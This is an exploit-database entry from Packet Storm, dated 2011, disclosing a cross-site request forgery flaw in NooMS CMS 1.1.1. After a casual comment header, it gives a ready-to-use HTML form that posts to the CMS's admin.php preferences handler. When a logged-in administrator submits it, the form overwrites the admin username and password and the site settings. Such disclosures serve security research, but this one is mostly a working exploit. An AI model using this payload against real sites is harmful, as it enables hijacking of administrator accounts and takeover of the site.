NooMS CMS 1.1.1 Cross Site Request Forgery

Type packetstorm
Reporter loneferret
Modified 2011-04-10T00:00:00


                                            `# NooMS CMS version 1.1.1 CSRF  
# Bug Found: April 9th 2011  
# Found by: loneferret (as far as I know anyway)  
# Software Download Link:  
# Nods to exploit-db Team  
# Well, I didn't have much to do this morning so figured I'd try to see how  
# fast it would take  
# me to find one of these. It's nothing to write home about. I mean...come  
# on! Who would use  
# a CMS named NooMS? This thing uses a MySQL database as well, wouldn't be  
# surprised if  
# there are other things to be found.  
# But I need to get some chores done before the wife starts.  
# Enjoy,  
# loneferret  
# p.s:  
# I wanted to contact the creator, but he's page (using NooMS) is  
# blank... nothing there so.. sorry.  
<form action='http://[host]/admin.php' method='post'>  
<input type=hidden name='op' value='pref'>  
<input type=hidden name='action' value='edit'>  
Admin Username: <input type=text size=20 name='admin_user' value=''><br>  
Admin Password: <input type=text size=20 name='admin_pwd' value=''><br>  
Site Name: <input type=text size=40 name='site_name' value=''><br>  
Site URL: <input type=text size=40 name='site_url' value=''><br>  
Number of results per page: <input type=text size=10 name='search_numr' value=''><br>  
Lang: <input type=text size=10 name='lang' value='en'><br>  
Theme: <input type=text name=template value='default'>  
<input type=submit value='change'>